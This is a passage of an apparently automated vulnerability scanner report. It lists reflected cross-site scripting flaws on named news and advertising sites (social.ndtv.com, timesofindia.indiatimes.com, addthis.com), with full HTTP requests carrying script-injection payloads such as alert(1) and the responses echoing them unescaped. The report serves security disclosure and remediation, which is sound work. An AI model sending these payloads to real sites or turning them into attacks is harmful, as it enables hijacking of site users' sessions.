HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 22754
Expires: Sun, 04 Sep 2011 03:32:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:32:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<fb:like href="http://social.ndtv.com/home.php?df4e4"><script>alert(1)</script>b631d811bfb=1" send="true" layout="box_count" width="100" show_faces="false" action="recommend" font="arial">
...[SNIP]...

6.160. http://social.ndtv.com/static/Comment/Form/ [ctype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acfa9</script><script>alert(1)</script>4078a43edf7 was submitted in the ctype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=storyacfa9</script><script>alert(1)</script>4078a43edf7&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14432
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
';
params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shut';
params += '&identifier=' + 'story-131142';
params += '&ctype=' + 'storyacfa9</script><script>alert(1)</script>4078a43edf7';
params += '&site=' + 'ndtv';

if(!o.cache){
params += '&rm=' + Math.random();
params += '&tt=' + (new Date).getTime();

...[SNIP]...

6.161. http://social.ndtv.com/static/Comment/Form/ [ctype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The value of the ctype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aab7e"><script>alert(1)</script>21b611b7d8d was submitted in the ctype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=storyaab7e"><script>alert(1)</script>21b611b7d8d&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14419
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:18 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="ctype" value="storyaab7e"><script>alert(1)</script>21b611b7d8d"/>
...[SNIP]...

6.162. http://social.ndtv.com/static/Comment/Form/ [identifier parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The value of the identifier request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec6d"><script>alert(1)</script>9da80c086d6 was submitted in the identifier parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142fec6d"><script>alert(1)</script>9da80c086d6 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14419
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="identifier" value="story-131142fec6d"><script>alert(1)</script>9da80c086d6"/>
...[SNIP]...

6.163. http://social.ndtv.com/static/Comment/Form/ [identifier parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The value of the identifier request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27bb1</script><script>alert(1)</script>543e86c15a9 was submitted in the identifier parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-13114227bb1</script><script>alert(1)</script>543e86c15a9 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14432
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
-mumbai-airport-s-main-runway-still-shut-131142';
params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shut';
params += '&identifier=' + 'story-13114227bb1</script><script>alert(1)</script>543e86c15a9';
params += '&ctype=' + 'story';
params += '&site=' + 'ndtv';

if(!o.cache){
params += '&rm=' + Math.random();
p
...[SNIP]...

6.164. http://social.ndtv.com/static/Comment/Form/ [link parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The value of the link request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84f35'%3balert(1)//3ee7c09651 was submitted in the link parameter. This input was echoed as 84f35';alert(1)//3ee7c09651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-13114284f35'%3balert(1)//3ee7c09651&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14413
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
var BASE_URL = "http://social.ndtv.com";
var CDN_URL = "";
var cookie_name = 'http://www.ndtv.com/article/india/48-hours-on-mumbai-airport-s-main-runway-still-shut-13114284f35';alert(1)//3ee7c09651';
</script>
...[SNIP]...

6.165. http://social.ndtv.com/static/Comment/Form/ [link parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The value of the link request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85b5"><script>alert(1)</script>77bb187e5d6 was submitted in the link parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142c85b5"><script>alert(1)</script>77bb187e5d6&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14461
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="page_url" value="http://www.ndtv.com/article/india/48-hours-on-mumbai-airport-s-main-runway-still-shut-131142c85b5"><script>alert(1)</script>77bb187e5d6"/>
...[SNIP]...

6.166. http://social.ndtv.com/static/Comment/Form/ [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e0d0"><script>alert(1)</script>f379e313f95 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut8e0d0"><script>alert(1)</script>f379e313f95&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14419
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="page_title" value="48 hours on, Mumbai airport's main runway still shut8e0d0"><script>alert(1)</script>f379e313f95" />
...[SNIP]...

6.167. http://social.ndtv.com/static/Comment/Form/ [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9e9d</script><script>alert(1)</script>e66a05d579 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shute9e9d</script><script>alert(1)</script>e66a05d579&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14430
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
= '&link=' + 'http://www.ndtv.com/article/india/48-hours-on-mumbai-airport-s-main-runway-still-shut-131142';
params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shute9e9d</script><script>alert(1)</script>e66a05d579';
params += '&identifier=' + 'story-131142';
params += '&ctype=' + 'story';
params += '&site=' + 'ndtv';

if(!o.cache){

...[SNIP]...

6.168. http://social.ndtv.com/tbModel/comments.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /tbModel/comments.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f53"><script>alert(1)</script>dbef8475859 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tbModel/comments.php?50f53"><script>alert(1)</script>dbef8475859=1 HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Sun, 04 Sep 2011 04:21:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:21:27 GMT
Content-Length: 9450
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a href="/tbModel/comments.php?page=2&amp;50f53"><script>alert(1)</script>dbef8475859=1">
...[SNIP]...

6.169. http://timesofindia.indiatimes.com/topic/Xss [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://timesofindia.indiatimes.com
Path:   /topic/Xss

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 400fa"%3b62b9b70133a was submitted in the REST URL parameter 2. This input was echoed as 400fa";62b9b70133a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/Xss400fa"%3b62b9b70133a HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.5.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); topic_visit1=Xss; RMFW=011R02Wt7108ni; _chartbeat2=8l1yir8xsllibs89

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 03:40:40 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 30700
Expires: Sun, 04 Sep 2011 05:30:40 GMT
Date: Sun, 04 Sep 2011 03:41:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" ><html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="text/html; char
...[SNIP]...
<script language="JavaScript">var searchvel = "Xss400fa";62b9b70133a";
   function GetParam(name)
   {
       var match = new RegExp('[\?&]'+name+"=([^&]+)","i").exec(location.search);
       if (match==null)
           return null;
       else
           return decodeURIComponent(match[1]).replace(/
...[SNIP]...

6.170. http://www.addthis.com/api/nai/optout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d302<script>alert(1)</script>40b48eadfe5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api5d302<script>alert(1)</script>40b48eadfe5/nai/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api5d302<script>alert(1)</script>40b48eadfe5/nai/optout?nocache=0.8710141</strong>
...[SNIP]...

6.171. http://www.addthis.com/api/nai/optout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7874"-alert(1)-"0e5a911a5e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apie7874"-alert(1)-"0e5a911a5e8/nai/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/apie7874"-alert(1)-"0e5a911a5e8/nai/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.172. http://www.addthis.com/api/nai/optout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a45d"-alert(1)-"f304ccb4a0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai2a45d"-alert(1)-"f304ccb4a0e/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
